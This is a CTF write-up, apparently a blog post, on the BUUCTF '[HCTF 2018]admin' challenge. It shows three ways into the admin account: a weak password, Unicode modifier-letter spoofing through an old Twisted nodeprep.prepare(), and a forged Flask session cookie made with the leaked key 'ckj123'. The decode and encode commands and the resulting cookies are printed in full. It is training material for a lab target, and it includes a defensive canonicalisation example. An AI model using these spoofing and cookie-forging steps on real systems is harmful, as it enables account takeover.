BUUCTF:[HCTF 2018]admin

Challenge address: https://buuoj.cn/challenges#[HCTF%202018]admin


The first solution: weak password

Following the hint, try weak passwords for the admin user. With the password 123, the login succeeds.


The second solution: Unicode spoofing.
Register an arbitrary user, mochu7, and open the Change Password page.
The page gives the challenge's source code; the relevant file is /hctf_flask/app/rotus.py


Both register and login pass the username through a custom function, strlower().

strlower() calls nodeprep.prepare(), which is imported from:

from twisted.words.protocols.jabber.xmpp_stringprep import nodeprep

The Twisted version can be seen in requirements.txt.

The Twisted version is 10.2.0, while the latest Twisted release at the time of writing (2020/10/28) is 20.3.0, so a very old version is in use here.
In version 10.2.0, nodeprep.prepare() turns certain special Unicode characters into normal characters when it processes them.
Use the following site to find special Unicode characters that spell admin:
https://unicode-table.com/en/search/?q=Modifier+Letter+Capital

ᴬᴰᴹᴵᴺ

As Unicode escapes:

\u1d2c\u1d30\u1d39\u1d35\u1d3a

After being processed twice by nodeprep.prepare(), these characters become admin.

So register an account named ᴬᴰᴹᴵᴺ. At registration, nodeprep.prepare() runs once and yields ADMIN. When you then change your password, nodeprep.prepare() runs a second time and yields admin, so the password that gets changed is that of the admin account.
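The two-pass behaviour above can be reproduced and guarded against with the standard library alone. The following is an added example, not the challenge's code and not Twisted's implementation: prep_once, is_stable and canonical_username are hypothetical names, and prep_once is an assumed, simplified model of a case-fold step followed by NFKC normalisation.

```python
import stringprep
import unicodedata


def prep_once(name: str) -> str:
    """Assumed model of the flawed step: case-fold with the Unicode 3.2
    stringprep table (B.2), then NFKC-normalise with the interpreter's
    current Unicode database. One pass is not enough to reach a fixed point."""
    folded = "".join(stringprep.map_table_b2(ch) for ch in name)
    return unicodedata.normalize("NFKC", folded)


def is_stable(name: str) -> bool:
    """True when a second pass changes nothing for this input."""
    once = prep_once(name)
    return prep_once(once) == once


def canonical_username(name: str) -> str:
    """Hardened variant: reject code points unassigned in Unicode 3.2
    (stringprep table A.1), then require a fixed point, so the value stored
    at registration is the value every later lookup compares against."""
    if any(stringprep.in_table_a1(ch) for ch in name):
        raise ValueError("username contains unassigned code points")
    canon = prep_once(name)
    if prep_once(canon) != canon:
        raise ValueError("username does not canonicalise to a fixed point")
    return canon


if __name__ == "__main__":
    spoof = "\u1d2c\u1d30\u1d39\u1d35\u1d3a"  # the string from the write-up
    first = prep_once(spoof)
    print(repr(first), repr(prep_once(first)), "stable:", is_stable(spoof))
    try:
        canonical_username(spoof)
    except ValueError as exc:
        print("rejected:", exc)
    print(canonical_username("Mochu7"))  # ordinary name canonicalises once
```

Canonicalising once at registration, storing that value, and comparing only canonical forms removes the gap between the name that was registered and the name that is later looked up.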

The third solution: forged Flask session

As is well known, Flask stores the session in a client-side cookie. It is not encrypted, only signed to prevent tampering.

Script for decoding and encoding Flask session cookies: https://github.com/noraj/flask-session-cookie-manager

The session of user mochu7:

{'_fresh': True, '_id': b'cbf743351a54bf3ded8ca2343c8479d60da235568a066582dc7814a5864c10618d87e3a13f7d37e6464470248ebd3233603c6d5e3597d2cf2c04b073d4518c53', 'csrf_token': b'7584ce1b2f1bd3155835e20862bc752607b31c7b', 'image': b'LqRX', 'name': 'mochu7', 'user_id': '10'}
PS D:\Tools\Web\flask-session-cookie-manager> python .\flask_session_cookie_manager3.py decode -s 'ckj123' -c '.eJw9kMGKwkAQRH9l6bOHZOKyEPAQGM0a6A66o2HmIm6MTjqJQlQ0I_77Di54rup61fWAzb6vzhbiS3-tRrCpdxA_4OMXYtAi68gtHLrVXatVoDvtTLpu8pQsMgYocEyy_DRS30w6HbwvJLYWpRakDoNJMcrlNPC3Y-Ilo0oEKtvkcteimN5R6MhIjIzSAfEiIJcMJG2rO89kdMSJ88SGipUj1XhvxoYzRrmsUZbOyEXo85gUTuA5gvLc7zeXU1Md3y-Q8-iUWizmg-FZ7XF38nXQrVvkxNfKau3KEFnfSMwdFhjpw-QVV3fbQ_VOUt-znyL5V47bzgvQnUp7_YIRXM9V_xoOwgCef1nZbOI.X5k9pg.ErECKkJ7jz7qU_-NGQSWFDgTq98'
{'_fresh': True, '_id': b'cbf743351a54bf3ded8ca2343c8479d60da235568a066582dc7814a5864c10618d87e3a13f7d37e6464470248ebd3233603c6d5e3597d2cf2c04b073d4518c53', 'csrf_token': b'7584ce1b2f1bd3155835e20862bc752607b31c7b', 'image': b'LqRX', 'name': 'mochu7', 'user_id': '10'}

Forging a session also requires knowing the secret key, which can be found by searching the whole source code folder.

The secret key is ckj123.

Change name to admin:

{'_fresh': True, '_id': b'cbf743351a54bf3ded8ca2343c8479d60da235568a066582dc7814a5864c10618d87e3a13f7d37e6464470248ebd3233603c6d5e3597d2cf2c04b073d4518c53', 'csrf_token': b'7584ce1b2f1bd3155835e20862bc752607b31c7b', 'image': b'LqRX', 'name': 'admin', 'user_id': '10'}

Encode it to get the admin session:

PS D:\Tools\Web\flask-session-cookie-manager> python .\flask_session_cookie_manager3.py encode -s 'ckj123' -t "{'_fresh': True, '_id': b'cbf743351a54bf3ded8ca2343c8479d60da235568a066582dc7814a5864c10618d87e3a13f7d37e6464470248ebd3233603c6d5e3597d2cf2c04b073d4518c53', 'csrf_token': b'7584ce1b2f1bd3155835e20862bc752607b31c7b', 'image': b'LqRX', 'name': 'admin', 'user_id': '10'}"
.eJw9kMGKwkAQRH9l6bOHZOJeBA-B0ayBbtEdDTOX4MZo0klciIqmxX_fwQXPVV2vuh6QH_ryXMHk0l_LEeT1HiYP-PiBCViVdiQrQdncrdkEtrPikm2zTKhCxgAVjkkXn07bm0tmg_eFxFWF2ioyx8ElGC31LPC3Y-I1o4kVmqpZ6n2LanZHZSOnMXLGBsSrgCQeSFet7TyTUYhj8cSGso2Qabw3Zccpo17XqAtxehX6PCaDU3iOoDj3h_zy25Sn9wskHp1Qi9licDyvPe5Ovg7KtkWOfa20tlKEyPZGaiGYYWSP01dc3e2O5TvJfM2_s_hfOe06L8Bu39UnGMH1XPav3SAM4PkH7IhsmA.X5k-3w.1NeZXj_XVt-fu-MQxsTtdPuBZws


Origin blog.csdn.net/mochu7777777/article/details/109302175